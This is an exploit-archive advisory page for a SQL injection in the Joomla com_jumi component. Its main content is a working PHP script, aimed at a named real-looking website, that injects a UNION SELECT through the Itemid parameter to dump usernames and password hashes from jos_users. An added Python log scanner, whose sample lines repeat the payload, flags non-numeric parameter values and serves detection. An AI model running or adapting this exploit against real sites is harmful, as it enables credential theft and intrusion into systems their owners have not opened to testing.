Joomla com_jumi - SQL Injection Exploit

2017.02.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php
# Author: Mateus a.k.a Dctor - Hatbash br
# fb : facebook.com/hatbashbr/

$host = "http://www.building.lv/";
// UNION-based injection appended to the Itemid parameter of com_jumi;
// column 2 of the 24-column result carries username:password from jos_users
$payload = "index.php?option=com_jumi&fileid=2&Itemid=4+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+";
$u = $host.$payload;

// Stream context for the GET request (fixed headers and User-Agent)
$random = array(
    'http' => array(
        'method' => "GET",
        'header' => "Accept-language: en\r\n" .
                    "Cookie: foo=bar\r\n" .
                    "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051008 Fedora/1.5-0.5.0.beta2 Firefox/1.4.1\r\n"
    )
);
$agent = stream_context_create($random);
$p = file_get_contents($u, false, $agent);

// Every 32-hex-digit string in the response body is reported as a password hash
if (preg_match_all('/([0-9a-fA-F]{32})/', $p, $r)) {
    $string = implode(", ", $r['0']);
    echo "[+] Target: ".$host ."\n";
    echo "[+] Passwords :\n";
    echo "\033[01;31m" .$string. "\n";
} else {
    echo "Not Vull";
}
?>
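
A defender-side check for the request pattern this exploit sends, as an added example that is not part of the original advisory: it scans web access logs for com_jumi requests whose fileid or Itemid value is not a plain integer. The log lines are constructed samples, and treating both parameters as integer-only is an assumption based on the values used in the payload.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not taken from the page.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Feb/2017:10:01:02 +0000] '
    '"GET /index.php?option=com_jumi&fileid=2&Itemid=4 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [25/Feb/2017:10:03:44 +0000] '
    '"GET /index.php?option=com_jumi&fileid=2&Itemid=4+UNION+SELECT+1,'
    'concat(username,0x3a,password),3+from/**/jos_users+--+ HTTP/1.1" 200 6011',
    '198.51.100.9 - - [25/Feb/2017:10:04:10 +0000] '
    '"GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 4300',
    '203.0.113.5 - - [25/Feb/2017:11:15:31 +0000] '
    '"GET /index.php?option=com_jumi&fileid=2%20union%20select%201&Itemid=4 HTTP/1.1" 200 900',
]

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Assumption: com_jumi expects both parameters to be integer IDs.
NUMERIC_PARAMS = ("fileid", "Itemid")


def suspicious_jumi_requests(lines):
    """Return (client, parameter, decoded value) for each com_jumi request
    whose fileid or Itemid is anything other than ASCII digits."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qs URL-decodes the values, so '+' and %20 both become spaces.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_jumi" not in query.get("option", []):
            continue
        for name in NUMERIC_PARAMS:
            for value in query.get(name, []):
                if not re.fullmatch(r"[0-9]+", value):
                    findings.append((client, name, value.strip()))
    return findings


if __name__ == "__main__":
    for client, name, value in suspicious_jumi_requests(SAMPLE_LOG):
        print(f"{client}: non-numeric {name}={value!r}")
```

The same integer-only test can be enforced in front of the application (for example as a WAF or rewrite rule) so that such requests are rejected before they reach the component.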


Copyright 2018, cxsecurity.com

 
